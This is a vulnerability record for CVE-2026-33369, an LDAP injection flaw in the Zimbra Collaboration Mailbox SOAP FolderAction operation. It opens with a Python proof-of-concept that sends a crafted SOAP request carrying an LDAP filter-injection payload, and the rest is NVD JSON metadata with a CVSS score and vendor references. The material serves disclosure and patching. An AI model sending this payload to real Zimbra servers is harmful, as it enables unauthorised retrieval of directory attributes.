CVE-2026-33369

import requests # Target configuration target_url = "https://example.com/service/soap" auth_token = "VALID_AUTH_TOKEN_HERE" # Obtained after login # LDAP injection payload to manipulate the filter # Example: trying to extract attributes or bypass logic injection_payload = "*)(uid=*))(|(uid=*" # Constructing the malicious SOAP request soap_headers = { "Content-Type": "application/soap+xml", "Cookie": f"ZM_AUTH_TOKEN={auth_token}" } soap_body = f"""<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> <soap:Header> <context xmlns="urn:zimbra"> <authToken>{auth_token}</authToken> </context> </soap:Header> <soap:Body> <FolderActionRequest xmlns="urn:zimbraMail"> <action op="rename" id="{injection_payload}" l="InjectedFolder"/> </FolderActionRequest> </soap:Body> </soap:Envelope>""" try: response = requests.post(target_url, headers=soap_headers, data=soap_body, verify=False) print(f"Status Code: {response.status_code}") print("Response:") print(response.text) except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-33369", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:16.017", "lastModified": "2026-04-01T15:36:59.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zimbra Collaboration (ZCS) 10.0 and 10.1 contains an LDAP injection vulnerability in the Mailbox SOAP service within a FolderAction operation. The application fails to properly sanitize user-supplied input before incorporating it into an LDAP search filter. An authenticated attacker can exploit this issue by sending a crafted SOAP request that manipulates the LDAP query, allowing retrieval of sensitive directory attributes."}, {"lang": "es", "value": "Zimbra Collaboration (ZCS) 10.0 y 10.1 contiene una vulnerabilidad de inyección LDAP en el servicio SOAP de Mailbox dentro de una operación FolderAction. La aplicación no logra sanear adecuadamente la entrada proporcionada por el usuario antes de incorporarla a un filtro de búsqueda LDAP. Un atacante autenticado puede explotar este problema enviando una solicitud SOAP manipulada que manipula la consulta LDAP, permitiendo la recuperación de atributos de directorio sensibles."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}